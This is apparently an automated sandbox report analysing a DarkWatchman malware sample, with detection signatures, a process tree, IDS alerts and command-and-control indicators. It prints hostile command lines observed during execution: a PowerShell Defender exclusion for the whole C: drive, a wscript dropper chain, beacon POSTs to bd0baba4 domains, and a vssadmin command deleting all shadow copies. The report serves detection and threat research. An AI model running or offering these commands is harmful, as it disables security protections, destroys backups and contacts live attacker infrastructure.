Edit tour

Windows Analysis Report
YyVnwn8Zst.exe

Overview

General Information

Sample name:	YyVnwn8Zst.exe renamed because original name is a hash value
Original sample name:	880a3b6203fef131d20346d1258ae22031c3d84d8a35d01c8f4b7fe3729c0d0c.exe
Analysis ID:	1585978
MD5:	6cbe4dde104084454980ae3405a0339c
SHA1:	bf2cc3af5ce453f099d8321c5798ad0de7e9ef67
SHA256:	880a3b6203fef131d20346d1258ae22031c3d84d8a35d01c8f4b7fe3729c0d0c
Tags:	exeuser-adrian__luca
Infos:

Detection

DarkWatchman

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected DarkWatchman

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates processes via WMI

Deletes shadow drive data (may be related to ransomware)

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious PowerShell Parameter Substring

Sigma detected: WScript or CScript Dropper

Sigma detected: WScript or CScript Dropper - File

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes or reads registry keys via WMI

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Sigma detected: Script Initiated Connection

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

YyVnwn8Zst.exe (PID: 1468 cmdline: "C:\Users\user\Desktop\YyVnwn8Zst.exe" MD5: 6CBE4DDE104084454980AE3405A0339C)

cmd.exe (PID: 3872 cmdline: "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe") MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5740 cmdline: powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 4256 cmdline: wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 4088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 5196 cmdline: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188 MD5: FF00E0480075B095948000BDC66E81F0)

wscript.exe (PID: 4836 cmdline: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188 MD5: FF00E0480075B095948000BDC66E81F0)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: wscript.exe PID: 4256	JoeSecurity_DarkWatchman	Yara detected DarkWatchman	Joe Security
Process Memory Space: wscript.exe PID: 4256	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x748d4:$ex: .ExecQuery( 0x74be3:$ex: .ExecQuery( 0x74e2f:$ex: .ExecQuery( 0x7933f:$ex: .ExecQuery( 0x794cc:$ex: .ExecQuery( 0x7f3db:$ex: .ExecQuery( 0x7f6ea:$ex: .ExecQuery( 0x7f936:$ex: .ExecQuery( 0x83e46:$ex: .ExecQuery( 0x83fd3:$ex: .ExecQuery( 0xc41bb:$ex: .ExecQuery( 0xc44ca:$ex: .ExecQuery( 0xc4716:$ex: .ExecQuery( 0xc8c26:$ex: .ExecQuery( 0xc8db3:$ex: .ExecQuery( 0x1cfbdf:$ex: .ExecQuery( 0x1cfeee:$ex: .ExecQuery( 0x1d013a:$ex: .ExecQuery( 0x1d464a:$ex: .ExecQuery( 0x1d47d7:$ex: .ExecQuery( 0x2138a5:$ex: .ExecQuery(
Process Memory Space: wscript.exe PID: 5196	JoeSecurity_DarkWatchman	Yara detected DarkWatchman	Joe Security
Process Memory Space: wscript.exe PID: 5196	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x2d9a:$ex: .ExecQuery( 0x2dcf:$ex: .ExecQuery( 0x2e03:$ex: .ExecQuery( 0x92b0:$ex: .ExecQuery( 0x95bf:$ex: .ExecQuery( 0x980b:$ex: .ExecQuery( 0xdd1b:$ex: .ExecQuery( 0xdea8:$ex: .ExecQuery( 0x1274b:$ex: .ExecQuery( 0x12a5a:$ex: .ExecQuery( 0x12ca6:$ex: .ExecQuery( 0x171b6:$ex: .ExecQuery( 0x17343:$ex: .ExecQuery( 0x81bb7:$ex: .ExecQuery( 0x81ec6:$ex: .ExecQuery( 0x82112:$ex: .ExecQuery( 0x86622:$ex: .ExecQuery( 0x867af:$ex: .ExecQuery( 0x8d303:$ex: .ExecQuery( 0x8d5d2:$ex: .ExecQuery( 0x8d642:$ex: .ExecQuery(
Process Memory Space: wscript.exe PID: 4836	JoeSecurity_DarkWatchman	Yara detected DarkWatchman	Joe Security
Process Memory Space: wscript.exe PID: 4836	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x2730e:$ex: .ExecQuery( 0x2761d:$ex: .ExecQuery( 0x27869:$ex: .ExecQuery( 0x2bd79:$ex: .ExecQuery( 0x2bf06:$ex: .ExecQuery( 0x34ab8:$ex: .ExecQuery( 0x34dc7:$ex: .ExecQuery( 0x35013:$ex: .ExecQuery( 0x39523:$ex: .ExecQuery( 0x396b0:$ex: .ExecQuery( 0x5ae1e:$ex: .ExecQuery( 0x5b3c2:$ex: .ExecQuery( 0x5b432:$ex: .ExecQuery( 0x5baae:$ex: .ExecQuery( 0x5fb39:$ex: .ExecQuery( 0x5fe48:$ex: .ExecQuery( 0x60094:$ex: .ExecQuery( 0x645a4:$ex: .ExecQuery( 0x64731:$ex: .ExecQuery( 0x8b112:$ex: .ExecQuery( 0x8b421:$ex: .ExecQuery(
Click to see the 1 entries

Other

Source	Rule	Description	Author	Strings
amsi32_4256.amsi.csv	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x176d:$ex: .ExecQuery( 0x1a8d:$ex: .ExecQuery( 0x1ceb:$ex: .ExecQuery( 0x647b:$ex: .ExecQuery( 0x6615:$ex: .ExecQuery( 0x243b:$s1: GetObject( 0x65c8:$s1: GetObject( 0xf517:$s1: GetObject( 0xf55b:$s1: GetObject( 0xf57e:$s1: GetObject( 0x897:$s2: String.fromCharCode( 0x10bf:$s3: ActiveXObject( 0x19c5:$s3: ActiveXObject( 0x2328:$s3: ActiveXObject( 0x235d:$s3: ActiveXObject( 0x2388:$s3: ActiveXObject( 0x2407:$s3: ActiveXObject( 0x2f80:$s3: ActiveXObject( 0x3090:$s3: ActiveXObject( 0x329b:$s3: ActiveXObject( 0x3492:$s3: ActiveXObject(
amsi32_5196.amsi.csv	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x176d:$ex: .ExecQuery( 0x1a8d:$ex: .ExecQuery( 0x1ceb:$ex: .ExecQuery( 0x647b:$ex: .ExecQuery( 0x6615:$ex: .ExecQuery( 0xb389:$ex: .ExecQuery( 0xb727:$ex: .ExecQuery( 0xbac4:$ex: .ExecQuery( 0xc307:$ex: .ExecQuery( 0xc6a5:$ex: .ExecQuery( 0xca42:$ex: .ExecQuery( 0xd25a:$ex: .ExecQuery( 0xd5f8:$ex: .ExecQuery( 0xd995:$ex: .ExecQuery( 0xe175:$ex: .ExecQuery( 0xe513:$ex: .ExecQuery( 0xe8b0:$ex: .ExecQuery( 0xee28:$ex: .ExecQuery( 0xf1c5:$ex: .ExecQuery( 0xf627:$ex: .ExecQuery( 0xf6f0:$ex: .ExecQuery(
amsi32_4836.amsi.csv	INDICATOR_SUSPICIOUS_JS_WMI_ExecQuery	Detects JS potentially executing WMI queries	ditekSHen	0x176d:$ex: .ExecQuery( 0x1a8d:$ex: .ExecQuery( 0x1ceb:$ex: .ExecQuery( 0x647b:$ex: .ExecQuery( 0x6615:$ex: .ExecQuery( 0xb389:$ex: .ExecQuery( 0xb727:$ex: .ExecQuery( 0xbac4:$ex: .ExecQuery( 0xc307:$ex: .ExecQuery( 0xc6a5:$ex: .ExecQuery( 0xca42:$ex: .ExecQuery( 0xd25a:$ex: .ExecQuery( 0xd5f8:$ex: .ExecQuery( 0xd995:$ex: .ExecQuery( 0xe175:$ex: .ExecQuery( 0xe513:$ex: .ExecQuery( 0xe8b0:$ex: .ExecQuery( 0xee28:$ex: .ExecQuery( 0xf1c5:$ex: .ExecQuery( 0xf627:$ex: .ExecQuery( 0xf6f0:$ex: .ExecQuery(

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe"), CommandLine: "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe"), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\YyVnwn8Zst.exe", ParentImage: C:\Users\user\Desktop\YyVnwn8Zst.exe, ParentProcessId: 1468, ParentProcessName: YyVnwn8Zst.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe"), ProcessId: 3872, ProcessName: cmd.exe

Sigma detected: Script Initiated Connection to Non-Local Network

Source: Network Connection

Author: frack113, Florian Roth: Data: DestinationIp: 185.159.131.230, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 5196, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49710

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:", CommandLine: powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:", CommandLine|base64offset|contains: ', Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe"), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3872, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:", ProcessId: 5740, ProcessName: powershell.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188, CommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4836, ProcessCommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188, ProcessId: 5196, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper - File

Source: File created

Author: Tim Shelton: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 4256, TargetFilename: C:\Users\user\AppData\Local\9e146be90.js

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:", CommandLine: powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:", CommandLine|base64offset|contains: ', Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe"), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3872, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:", ProcessId: 5740, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Script Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.159.131.230, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 5196, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49710

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188, CommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4836, ProcessCommandLine: C:\Windows\SysWOW64\wscript.exe "C:\Users\user\AppData\Local\9e146be90.js" 188, ProcessId: 5196, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:", CommandLine: powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:", CommandLine|base64offset|contains: ', Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 4157934657 188 "C:\Users\user\Desktop\YyVnwn8Zst.exe"), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3872, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:", ProcessId: 5740, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Win32/DarkWatchMan Checkin Activity (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T15:47:07.965728+0100	2048563	1	A Network Trojan was detected	192.168.2.6	49710	185.159.131.230	443	TCP
2025-01-08T15:47:09.041997+0100	2048563	1	A Network Trojan was detected	192.168.2.6	49711	185.159.131.230	443	TCP

ET MALWARE Win32/DarkWatchman Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T15:47:07.965728+0100	2035186	1	A Network Trojan was detected	192.168.2.6	49710	185.159.131.230	443	TCP

ET MALWARE Win32/DarkWatchman Checkin Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T15:47:10.832365+0100	2034745	1	A Network Trojan was detected	192.168.2.6	49713	185.159.131.230	443	TCP
2025-01-08T15:47:12.163940+0100	2034745	1	A Network Trojan was detected	192.168.2.6	49714	185.159.131.230	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.3% probability

Source: YyVnwn8Zst.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 185.159.131.230:443 -> 192.168.2.6:49710 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 185.159.131.230:443 -> 192.168.2.6:49711 version: TLS 1.0

Source: YyVnwn8Zst.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: YyVnwn8Zst.exe

Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BCA383 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00BCA383
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BEA02E FindFirstFileExA,	0_2_00BEA02E
Source: C:\Users\user\Desktop\YyVnwn8Zst.exe	Code function: 0_2_00BDB014 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00BDB014

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2035186 - Severity 1 - ET MALWARE Win32/DarkWatchman Activity (POST) : 192.168.2.6:49710 -> 185.159.131.230:443
Source: Network traffic	Suricata IDS: 2048563 - Severity 1 - ET MALWARE Win32/DarkWatchMan Checkin Activity (POST) M2 : 192.168.2.6:49710 -> 185.159.131.230:443
Source: Network traffic	Suricata IDS: 2034745 - Severity 1 - ET MALWARE Win32/DarkWatchman Checkin Activity (POST) : 192.168.2.6:49714 -> 185.159.131.230:443
Source: Network traffic	Suricata IDS: 2048563 - Severity 1 - ET MALWARE Win32/DarkWatchMan Checkin Activity (POST) M2 : 192.168.2.6:49711 -> 185.159.131.230:443
Source: Network traffic	Suricata IDS: 2034745 - Severity 1 - ET MALWARE Win32/DarkWatchman Checkin Activity (POST) : 192.168.2.6:49713 -> 185.159.131.230:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 185.159.131.230 443

Source: global traffic

TCP traffic: 192.168.2.6:61178 -> 162.159.36.2:53

Source: Joe Sandbox View

ASN Name: ITOS-ASRU ITOS-ASRU

Source: Joe Sandbox View

JA3 fingerprint: 1138de370e523e824bbca92d049a3777

Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /User-Agent: Mozilla/5.0(Windows NT 10.0;WOW64;Trident/7.0;rv:11.1)like GeckoX-Client-Id: 9e146be9X-Client-Controller: 0X-Client-Ut: 864178Content-Length: 8Host: bd0baba4.site
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /User-Agent: Mozilla/5.0(Windows NT 10.0;WOW64;Trident/7.0;rv:11.1)like GeckoX-Client-Id: 9e146be9X-Client-Controller: 0X-Client-Ut: 864178Content-Length: 8Host: bd0baba4.site
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /User-Agent: Mozilla/5.0(Windows NT 10.0;WOW64;Trident/7.0;rv:11.1)like GeckoX-Client-Id: 9e146be9X-Client-Controller: 2X-Client-Ut: 864178Content-Length: 159Host: bd0baba4.site
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /User-Agent: Mozilla/5.0(Windows NT 10.0;WOW64;Trident/7.0;rv:11.1)like GeckoX-Client-Id: 9e146be9X-Client-Controller: 2X-Client-Ut: 864178Content-Length: 159Host: bd0baba4.site

Source: unknown	HTTPS traffic detected: 185.159.131.230:443 -> 192.168.2.6:49710 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 185.159.131.230:443 -> 192.168.2.6:49711 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: bd0baba4.online
Source: global traffic	DNS traffic detected: DNS query: bd0baba4.store
Source: global traffic	DNS traffic detected: DNS query: bd0baba4.site

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*User-Agent: Mozilla/5.0(Windows NT 10.0;WOW64;Trident/7.0;rv:11.1)like GeckoX-Client-Id: 9e146be9X-Client-Controller: 0X-Client-Ut: 864178Content-Length: 8Host: bd0baba4.site

Source: wscript.exe, 0000000B.00000002.3369330783.0000000002BF9000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bd0ba/index.php
Source: wscript.exe, 0000000A.00000002.3370693123.00000000051DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.3370131318.0000000004CB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3370436183.000000000544D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3370834799.0000000005895000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.online/index.php
Source: wscript.exe, 0000000A.00000002.3369313927.00000000006F9000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site
Source: wscript.exe, 0000000B.00000002.3369537830.0000000002F93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site/
Source: wscript.exe, 0000000B.00000002.3371056470.0000000005A9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site/IW
Source: wscript.exe, 0000000A.00000002.3370809663.0000000005373000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site/index.
Source: wscript.exe, 0000000B.00000002.3370834799.0000000005895000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3371056470.0000000005A83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site/index.php
Source: wscript.exe, 0000000A.00000002.3369609341.0000000002A52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site/index.php-N
Source: wscript.exe, 0000000A.00000002.3370809663.0000000005353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site/index.phpP
Source: wscript.exe, 0000000A.00000002.3370809663.0000000005373000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site/index.php_P
Source: wscript.exe, 0000000B.00000002.3371056470.0000000005A30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site/index.phpdll
Source: wscript.exe, 0000000A.00000002.3370809663.0000000005373000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site/l
Source: wscript.exe, 0000000A.00000002.3369609341.0000000002A52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site/w
Source: wscript.exe, 0000000A.00000002.3369609341.0000000002A52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3369537830.0000000002F85000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.site:443/index.php
Source: wscript.exe, 0000000A.00000002.3369313927.00000000006F9000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.sitehp
Source: wscript.exe, 0000000A.00000002.3370809663.0000000005373000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.store/in
Source: wscript.exe, 0000000A.00000002.3369947317.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.3370693123.00000000051DA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.3370131318.0000000004CB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3370436183.000000000544D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3369537830.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.3370834799.0000000005895000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.store/index.php
Source: wscript.exe, 0000000A.00000002.3370809663.0000000005310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bd0baba4.store/index.phpo

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Spam, unwanted Advertisements and Ransom Demands

Deletes shadow drive data (may be related to ransomware)

Source: wscript.exe, 00000006.00000002.2167612608.0000000002CF8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: vssadmin.exe Delete Shadows /All /QuietxtStream.Write("");
Source: wscript.exe, 00000006.00000003.2167176940.0000000003248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IWshShell3.Run("vssadmin.exe Delete Shadows /All /Quiet", "2", "false");
